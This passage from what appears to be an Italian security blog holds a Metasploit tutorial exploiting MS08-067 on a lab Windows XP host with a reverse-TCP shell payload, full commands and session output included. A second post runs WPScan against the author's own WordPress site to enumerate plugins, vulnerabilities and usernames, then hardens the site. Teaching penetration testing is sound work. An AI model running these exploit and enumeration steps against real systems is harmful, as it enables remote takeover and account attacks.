   windows/meterpreter/bind_hidden_ipknock_tcp                          normal  Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
   windows/meterpreter/bind_hidden_tcp                                  normal  Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
   windows/meterpreter/bind_ipv6_tcp                                    normal  Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
   windows/meterpreter/bind_ipv6_tcp_uuid                               normal  Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   windows/meterpreter/bind_named_pipe                                  normal  Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager
   windows/meterpreter/bind_nonx_tcp                                    normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
   windows/meterpreter/bind_tcp                                         normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)
   windows/meterpreter/bind_tcp_rc4                                     normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   windows/meterpreter/bind_tcp_uuid                                    normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
   windows/meterpreter/reverse_hop_http                                 normal  Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
   windows/meterpreter/reverse_http                                     normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet)
   windows/meterpreter/reverse_https                                    normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet)
   windows/meterpreter/reverse_https_proxy                              normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
   windows/meterpreter/reverse_ipv6_tcp                                 normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
   windows/meterpreter/reverse_named_pipe                               normal  Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager
   windows/meterpreter/reverse_nonx_tcp                                 normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_ord_tcp                                  normal  Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_tcp                                      normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
   windows/meterpreter/reverse_tcp_allports                             normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
   windows/meterpreter/reverse_tcp_dns                                  normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
   windows/meterpreter/reverse_tcp_rc4                                  normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   windows/meterpreter/reverse_tcp_uuid                                 normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support
   windows/meterpreter/reverse_udp                                      normal  Windows Meterpreter (Reflective Injection), Reverse UDP Stager with UUID Support
   windows/metsvc_bind_tcp                                              normal  Windows Meterpreter Service, Bind TCP
   windows/metsvc_reverse_tcp                                           normal  Windows Meterpreter Service, Reverse TCP Inline
   windows/patchupdllinject/bind_hidden_ipknock_tcp                     normal  Windows Inject DLL, Hidden Bind Ipknock TCP Stager
   windows/patchupdllinject/bind_hidden_tcp                             normal  Windows Inject DLL, Hidden Bind TCP Stager
   windows/patchupdllinject/bind_ipv6_tcp                               normal  Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)
   windows/patchupdllinject/bind_ipv6_tcp_uuid                          normal  Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   windows/patchupdllinject/bind_named_pipe                             normal  Windows Inject DLL, Windows x86 Bind Named Pipe Stager
   windows/patchupdllinject/bind_nonx_tcp                               normal  Windows Inject DLL, Bind TCP Stager (No NX or Win7)
   windows/patchupdllinject/bind_tcp                                    normal  Windows Inject DLL, Bind TCP Stager (Windows x86)
   windows/patchupdllinject/bind_tcp_rc4                                normal  Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   windows/patchupdllinject/bind_tcp_uuid                               normal  Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)
   windows/patchupdllinject/reverse_ipv6_tcp                            normal  Windows Inject DLL, Reverse TCP Stager (IPv6)
   windows/patchupdllinject/reverse_nonx_tcp                            normal  Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_ord_tcp                             normal  Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_tcp                                 normal  Windows Inject DLL, Reverse TCP Stager
   windows/patchupdllinject/reverse_tcp_allports                        normal  Windows Inject DLL, Reverse All-Port TCP Stager
   windows/patchupdllinject/reverse_tcp_dns                             normal  Windows Inject DLL, Reverse TCP Stager (DNS)
   windows/patchupdllinject/reverse_tcp_rc4                             normal  Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   windows/patchupdllinject/reverse_tcp_uuid                            normal  Windows Inject DLL, Reverse TCP Stager with UUID Support
   windows/patchupdllinject/reverse_udp                                 normal  Windows Inject DLL, Reverse UDP Stager with UUID Support
   windows/patchupmeterpreter/bind_hidden_ipknock_tcp                   normal  Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager
   windows/patchupmeterpreter/bind_hidden_tcp                           normal  Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
   windows/patchupmeterpreter/bind_ipv6_tcp                             normal  Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)
   windows/patchupmeterpreter/bind_ipv6_tcp_uuid                        normal  Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   windows/patchupmeterpreter/bind_named_pipe                           normal  Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager
   windows/patchupmeterpreter/bind_nonx_tcp                             normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/bind_tcp                                  normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)
   windows/patchupmeterpreter/bind_tcp_rc4                              normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   windows/patchupmeterpreter/bind_tcp_uuid                             normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)
   windows/patchupmeterpreter/reverse_ipv6_tcp                          normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
   windows/patchupmeterpreter/reverse_nonx_tcp                          normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_ord_tcp                           normal  Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_tcp                               normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
   windows/patchupmeterpreter/reverse_tcp_allports                      normal  Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
   windows/patchupmeterpreter/reverse_tcp_dns                           normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
   windows/patchupmeterpreter/reverse_tcp_rc4                           normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   windows/patchupmeterpreter/reverse_tcp_uuid                          normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support
   windows/patchupmeterpreter/reverse_udp                               normal  Windows Meterpreter (skape/jt Injection), Reverse UDP Stager with UUID Support
   windows/shell/bind_hidden_ipknock_tcp                                normal  Windows Command Shell, Hidden Bind Ipknock TCP Stager
   windows/shell/bind_hidden_tcp                                        normal  Windows Command Shell, Hidden Bind TCP Stager
   windows/shell/bind_ipv6_tcp                                          normal  Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)
   windows/shell/bind_ipv6_tcp_uuid                                     normal  Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   windows/shell/bind_named_pipe                                        normal  Windows Command Shell, Windows x86 Bind Named Pipe Stager
   windows/shell/bind_nonx_tcp                                          normal  Windows Command Shell, Bind TCP Stager (No NX or Win7)
   windows/shell/bind_tcp                                               normal  Windows Command Shell, Bind TCP Stager (Windows x86)
   windows/shell/bind_tcp_rc4                                           normal  Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   windows/shell/bind_tcp_uuid                                          normal  Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)
   windows/shell/reverse_ipv6_tcp                                       normal  Windows Command Shell, Reverse TCP Stager (IPv6)
   windows/shell/reverse_nonx_tcp                                       normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   windows/shell/reverse_ord_tcp                                        normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/shell/reverse_tcp                                            normal  Windows Command Shell, Reverse TCP Stager
   windows/shell/reverse_tcp_allports                                   normal  Windows Command Shell, Reverse All-Port TCP Stager
   windows/shell/reverse_tcp_dns                                        normal  Windows Command Shell, Reverse TCP Stager (DNS)
   windows/shell/reverse_tcp_rc4                                        normal  Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   windows/shell/reverse_tcp_uuid                                       normal  Windows Command Shell, Reverse TCP Stager with UUID Support
   windows/shell/reverse_udp                                            normal  Windows Command Shell, Reverse UDP Stager with UUID Support
   windows/shell_bind_tcp                                               normal  Windows Command Shell, Bind TCP Inline
   windows/shell_hidden_bind_tcp                                        normal  Windows Command Shell, Hidden Bind TCP Inline
   windows/shell_reverse_tcp                                            normal  Windows Command Shell, Reverse TCP Inline
   windows/speak_pwned                                                  normal  Windows Speech API - Say "You Got Pwned!"
   windows/upexec/bind_hidden_ipknock_tcp                               normal  Windows Upload/Execute, Hidden Bind Ipknock TCP Stager
   windows/upexec/bind_hidden_tcp                                       normal  Windows Upload/Execute, Hidden Bind TCP Stager
   windows/upexec/bind_ipv6_tcp                                         normal  Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)
   windows/upexec/bind_ipv6_tcp_uuid                                    normal  Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   windows/upexec/bind_named_pipe                                       normal  Windows Upload/Execute, Windows x86 Bind Named Pipe Stager
   windows/upexec/bind_nonx_tcp                                         normal  Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
   windows/upexec/bind_tcp                                              normal  Windows Upload/Execute, Bind TCP Stager (Windows x86)
   windows/upexec/bind_tcp_rc4                                          normal  Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   windows/upexec/bind_tcp_uuid                                         normal  Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)
   windows/upexec/reverse_ipv6_tcp                                      normal  Windows Upload/Execute, Reverse TCP Stager (IPv6)
   windows/upexec/reverse_nonx_tcp                                      normal  Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
   windows/upexec/reverse_ord_tcp                                       normal  Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/upexec/reverse_tcp                                           normal  Windows Upload/Execute, Reverse TCP Stager
   windows/upexec/reverse_tcp_allports                                  normal  Windows Upload/Execute, Reverse All-Port TCP Stager
   windows/upexec/reverse_tcp_dns                                       normal  Windows Upload/Execute, Reverse TCP Stager (DNS)
   windows/upexec/reverse_tcp_rc4                                       normal  Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   windows/upexec/reverse_tcp_uuid                                      normal  Windows Upload/Execute, Reverse TCP Stager with UUID Support
   windows/upexec/reverse_udp                                           normal  Windows Upload/Execute, Reverse UDP Stager with UUID Support
   windows/vncinject/bind_hidden_ipknock_tcp                            normal  VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager
   windows/vncinject/bind_hidden_tcp                                    normal  VNC Server (Reflective Injection), Hidden Bind TCP Stager
   windows/vncinject/bind_ipv6_tcp                                      normal  VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
   windows/vncinject/bind_ipv6_tcp_uuid                                 normal  VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   windows/vncinject/bind_named_pipe                                    normal  VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager
   windows/vncinject/bind_nonx_tcp                                      normal  VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
   windows/vncinject/bind_tcp                                           normal  VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)
   windows/vncinject/bind_tcp_rc4                                       normal  VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   windows/vncinject/bind_tcp_uuid                                      normal  VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
   windows/vncinject/reverse_hop_http                                   normal  VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
   windows/vncinject/reverse_http                                       normal  VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)
   windows/vncinject/reverse_ipv6_tcp                                   normal  VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
   windows/vncinject/reverse_nonx_tcp                                   normal  VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/vncinject/reverse_ord_tcp                                    normal  VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/vncinject/reverse_tcp                                        normal  VNC Server (Reflective Injection), Reverse TCP Stager
   windows/vncinject/reverse_tcp_allports                               normal  VNC Server (Reflective Injection), Reverse All-Port TCP Stager
   windows/vncinject/reverse_tcp_dns                                    normal  VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
   windows/vncinject/reverse_tcp_rc4                                    normal  VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   windows/vncinject/reverse_tcp_uuid                                   normal  VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support
   windows/vncinject/reverse_udp                                        normal  VNC Server (Reflective Injection), Reverse UDP Stager with UUID Support

msf exploit(windows/smb/ms08_067_netapi) > 

Metasploit – Impostare manualmente un Payload

In questo esempio verrà usato il Payload windows/shell/reverse_tcp che permette di eseguire comandi da amministratore sulla macchina presa di mira. Ci sono due tipi di Shell, Bind Shells e Reverse Shells.
BIND SHELLS
La Bind Shell da istruzioni al target di eseguire una Shell e di ascoltare su una porta specifica. Il problema è che ogni firewall è configurato per default per bloccare tutto il traffico in entrata – tutte le porte – e quindi questa tecnica risulterebbe poco efficace.
REVERSE SHELLS
Con una Reverse Shell è l’attacker che ha una porta aperta e che funge da server, in questo modo si possono eludere le regole del firewall.

Per usare un Payload eseguire il comando set payload come segue:

msf exploit(windows/smb/ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(windows/smb/ms08_067_netapi) >

Per vedere quali informazioni bisogna fornire al programma con questa nuova impostazione eseguire di nuovo il comando show options.

msf exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    10.10.10.7       yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   45  Windows XP SP3 Italian (NX)


msf exploit(windows/smb/ms08_067_netapi) >

Come si può notare dall’output del comando bisogna inserire il proprio indirizzo IP – da dove si attacca la macchina Windows -, LHOST sta per local host.

msf exploit(windows/smb/ms08_067_netapi) > set lhost 10.10.10.5
lhost => 10.10.10.5
msf exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    10.10.10.7       yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.10.5	      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   45  Windows XP SP3 Italian (NX)


msf exploit(windows/smb/ms08_067_netapi) >

Ora abbiamo tutto quello che ci serve per potere eseguire l’exploit con il Payload scelto con successo.

Metasploit – Exploit

msf exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 10.10.10.5:4444 
[*] 10.10.10.7:445 - Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.10.7
[*] Command shell session 1 opened (10.10.10.5:4444 -> 10.10.10.7:1037) at 2019-03-04 12:30:23 +0100


C:\WINDOWS\system32>

Come si può vedere l’exploit ha avuto successo e appare un promt dei commandi di Windows con cui si può fare praticamente qualsiasi cosa sulla macchina della vittima.

Tratto in parte dal libro: Penetration Testing – a hands-on introduction to Hacking di Giorgia Weidman

└ Tags: ethical hacking, exploit, guida, italiano, Kali Linux, Metasploit, MS08-67, Nmap, Penetration testing, Penetration Testing - a hands-on Introduction to Hacking, sicurezza informatica, vulnerabilità, windows
 Comment 

Sicurezza WordPress – Penetration test con Kali Linux

Gen19
on 19 Gennaio 2019 at 18:01
Posted In: Ethical Hacking / Penetration Testing, Sicurezza / Anonimato, WordPress

Guida in italiano sul come testare la sicurezza del proprio sito/server effettuando dei penetration test con Kali Linux.

Cos’è Kali Linux

Kali Linux è una distribuzione Linux per “penetration testers” e ethical hackers. Kali Linux, il successore di BackTrack Linux, è basato su Debian e viene fornito con tutti i programmi per testare la sicurezza ed effettuare dei penetration test preinstallati e preconfigurati.

Se si clicca in alto a sinistra su “Applications” appare un menu con tutti programmi che servono per testare la sicurezza in generale (la sicurezza di reti senza fili, siti, password eccetera) e nel menu numero 3, “Web Application Analysis”, ci sono tutti i programmi più conosciti per testare la sicurezza del proprio sito/server come per esempio wpscan e owasp-zap.

Kali Linux - Web ApplicationPer scaricare Kali Linux cliccare sul seguente link: Kali Linux ISO Download.

Testare la sicurezza di WordPress con WPScan

WPScan è un programma usato per rilevare vulnerabilità in siti WordPress e testare la sicurezza. Con WPScan è possibile scoprire quali plugins sono installati in modo da poterli “exploitare” se non sono aggiornati, si può scoprire il nome dell’amministratore del blog per poi tentare di “crackare” la password con un attacco “brute force”, si può scoprire il tema WordPress o/e la versione di WordPress in uso per poi cercare degli “exploits” e molto altro.

Ecco un semplice esempio:

:~ # wpscan --url https://christeninformatica.ch
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.4.3
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

Scan Aborted: The remote website is up, but does not seem to be running WordPress.
:~ # 

Provando a testare il mio sito ho ricevuto un errore: “Scan Aborted: The remote website is up, but does not seem to be running WordPress“. Per vari motivi può essere che il sito sia WordPress ma risulti come se non lo sia. Se si dovesse essere sicuri – o per andare sul sicuro – che il sito in questione utilizzi WordPress, usare l’opzione –force che “forza” ad effettuare la scansione senza controllare se il sito è WordPress.

# wpscan --force --url https://christeninformatica.ch
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.4.3
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: https://christeninformatica.ch/
[+] Started: Sat Jan 19 16:57:22 2019

Interesting Finding(s):

[+] https://christeninformatica.ch/
 | Interesting Entry: Server: Apache
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] https://christeninformatica.ch/robots.txt
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 5.0.3 identified (Latest, released on 2019-01-09).
 | Detected By: Rss Generator (Aggressive Detection)
 |  - https://christeninformatica.ch/feed/, https://wordpress.org/?v=5.0.3
 |  - https://christeninformatica.ch/comments/feed/, https://wordpress.org/?v=5.0.3

[i] The main theme could not be detected.

[+] Enumerating All Plugins
[+] Checking Plugin Versions

[i] Plugin(s) Identified:

[+] wp-super-cache
 | Location: https://christeninformatica.ch/tag/plugins/wp-super-cache/
 | Latest Version: 1.6.4
 | Last Updated: 2018-12-20T09:36:00.000Z
 |
 | Detected By: Comment (Passive Detection)
 |
 | [!] 10 vulnerabilities identified:
 |
 | [!] Title: WP-Super-Cache 1.3 - Remote Code Execution
 |     Fixed in: 1.3.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6623
 |      - http://www.acunetix.com/blog/web-security-zone/wp-plugins-remote-code-execution/
 |      - http://wordpress.org/support/topic/pwn3d
 |      - http://blog.sucuri.net/2013/04/update-wp-super-cache-and-w3tc-immediately-remote-code-execution-vulnerability-disclosed.html
 |
 | [!] Title: WP Super Cache 1.3 - trunk/wp-cache.php wp_nonce_url Function URI XSS
 |     Fixed in: 1.3.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6624
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
 |
 | [!] Title: WP Super Cache 1.3 - trunk/plugins/wptouch.php URI XSS
 |     Fixed in: 1.3.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6625
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
 |
 | [!] Title: WP Super Cache 1.3 - trunk/plugins/searchengine.php URI XSS
 |     Fixed in: 1.3.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6626
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
 |
 | [!] Title: WP Super Cache 1.3 - trunk/plugins/domain-mapping.php URI XSS
 |     Fixed in: 1.3.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6627
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
 |
 | [!] Title: WP Super Cache 1.3 - trunk/plugins/badbehaviour.php URI XSS
 |     Fixed in: 1.3.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6628
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
 |
 | [!] Title: WP Super Cache 1.3 - trunk/plugins/awaitingmoderation.php URI XSS
 |     Fixed in: 1.3.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6629
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
 |
 | [!] Title: WP Super Cache <= 1.4.2 - Stored Cross-Site Scripting (XSS)
 |     Fixed in: 1.4.3
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/7889
 |      - http://blog.sucuri.net/2015/04/security-advisory-persistent-xss-in-wp-super-cache.html
 |
 | [!] Title: WP Super Cache <= 1.4.4 - Cross-Site Scripting (XSS)
 |     Fixed in: 1.4.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8197
 |      - http://z9.io/2015/09/25/wp-super-cache-1-4-5/
 |
 | [!] Title: WP Super Cache <= 1.4.4 - PHP Object Injection
 |     Fixed in: 1.4.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8198
 |      - http://z9.io/2015/09/25/wp-super-cache-1-4-5/
 |
 | The version could not be determined.

[+] Enumerating Config Backups
 Checking Config Backups - Time: 00:00:05 <==================================================================================================================================================================================================> (21 / 21) 100.00% Time: 00:00:05

[i] No Config Backups Found.

[+] Finished: Sat Jan 19 16:57:38 2019
[+] Requests Done: 50
[+] Cached Requests: 7
[+] Data Sent: 8.144 KB
[+] Data Received: 896.239 KB
[+] Memory used: 84.176 MB
[+] Elapsed time: 00:00:16
:~ #

Da come si può vedere dal risultato di questa prima “scansione” abbiamo un grave problema: WPScan a rilevato la versione di WordPress in uso. Per risolvere questo problema ho bloccato l’accesso a “christeninformatica.ch/feed” e disabilitato gli RSS Feed. Se si effettua un nuovo test per vedere se le modifiche apportate hanno avuto successo e si nota che WPScan usa altri metodi per determinare la versione di WordPress, scoprire come impedirlo e testare di nuovo.

Scoprire il nome dell’amministratore WordPress con WPScan

:~ # wpscan --force --url https://christeninformatica.ch --enumerate u
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.4.3
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: https://christeninformatica.ch/
[+] Started: Sat Jan 19 17:02:11 2019

Interesting Finding(s):

[+] https://christeninformatica.ch/
 | Interesting Entry: Server: Apache
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] https://christeninformatica.ch/robots.txt
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 5.0.3 identified (Latest, released on 2019-01-09).
 | Detected By: Rss Generator (Aggressive Detection)
 |  - https://christeninformatica.ch/feed/, https://wordpress.org/?v=5.0.3
 |  - https://christeninformatica.ch/comments/feed/, https://wordpress.org/?v=5.0.3

[i] The main theme could not be detected.

[+] Enumerating Users
 Brute Forcing Author IDs - Time: 00:00:02 <=================================================================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:02

[i] User(s) Identified:

[+] chituser
 | Detected By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By: Wp Json Api (Aggressive Detection)
 |  - https://christeninformatica.ch/wp-json/wp/v2/users/

[+] chitadmin
 | Detected By: Rss Generator (Aggressive Detection)

[+] Finished: Sat Jan 19 17:02:16 2019
[+] Requests Done: 18
[+] Cached Requests: 28
[+] Data Sent: 3.107 KB
[+] Data Received: 482.021 KB
[+] Memory used: 24.863 MB
[+] Elapsed time: 00:00:04
:~ #

Con l’opzione “–enumerate” u (users) si controlla se informazioni come il nome dell’amministratore e di altri utenti, sono protette o meno. E anche qui WPScan ha rilevato un problema, ha scoperto il nome dell’amministratore e di un altro utente. Un malintenzionato potrebbe ora provare a crackare la password e ottenere diritti d’amministratore sul sito WordPress. Per risolvere questo problema disabilitare Wp Json Api e configurare il tema WordPress in uso in modo da non mostrare l’autore.

Disabilitare le Rest API in WordPress con Ithemes Security

Per disabilitare WP Json API andare nella sezione “WordPress Tweaks” di Ithemes Security e poi in REST API scegliere “Restricted Access”.

Kali Linux - Web Application

Scoprire i plugin WordPress in uso con WPScan

:~ # wpscan --force --url https://christeninformatica.ch --enumerate p
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.4.3
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: https://christeninformatica.ch/
[+] Started: Sat Jan 19 17:10:51 2019

Interesting Finding(s):

[+] https://christeninformatica.ch/
 | Interesting Entry: Server: Apache
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] https://christeninformatica.ch/robots.txt
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 5.0.3 identified (Latest, released on 2019-01-09).
 | Detected By: Rss Generator (Aggressive Detection)
 |  - https://christeninformatica.ch/feed/, https://wordpress.org/?v=5.0.3
 |  - https://christeninformatica.ch/comments/feed/, https://wordpress.org/?v=5.0.3

[i] The main theme could not be detected.

[+] Enumerating Most Popular Plugins
[+] Checking Plugin Versions

[i] Plugin(s) Identified:

[+] wp-super-cache
 | Location: https://christeninformatica.ch/tag/plugins/wp-super-cache/
 | Latest Version: 1.6.4
 | Last Updated: 2018-12-20T09:36:00.000Z
 |
 | Detected By: Comment (Passive Detection)
 |
 | [!] 10 vulnerabilities identified:
 |
 | [!] Title: WP-Super-Cache 1.3 - Remote Code Execution
 |     Fixed in: 1.3.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6623
 |      - http://www.acunetix.com/blog/web-security-zone/wp-plugins-remote-code-execution/
 |      - http://wordpress.org/support/topic/pwn3d
 |      - http://blog.sucuri.net/2013/04/update-wp-super-cache-and-w3tc-immediately-remote-code-execution-vulnerability-disclosed.html
 |
 | [!] Title: WP Super Cache 1.3 - trunk/wp-cache.php wp_nonce_url Function URI XSS
 |     Fixed in: 1.3.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6624
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
 |
